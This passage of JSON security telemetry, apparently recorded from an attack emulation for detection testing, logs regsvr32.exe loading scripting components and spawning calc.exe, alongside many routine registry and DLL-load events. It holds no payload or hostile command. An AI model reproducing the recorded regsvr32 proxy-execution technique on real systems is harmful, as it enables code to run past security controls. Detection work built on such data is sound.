"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wshom.ocx", - "image_path": "C:\\Windows\\System32\\wshom.ocx", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\Windows\\System32\\calc.exe\" ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "regsvr32.exe", - "parent_process_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 4724, - "ppid": 2012, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "subtype": "create", - "timestamp": 131883573241160000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "scrrun.dll", - "image_path": "C:\\Windows\\System32\\scrrun.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240430000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241200016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": 
"C:\\Windows\\System32\\msvcp_win.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "MpClient.dll", - "image_path": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573240580000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - 
"pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "process", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573241369984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573241509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 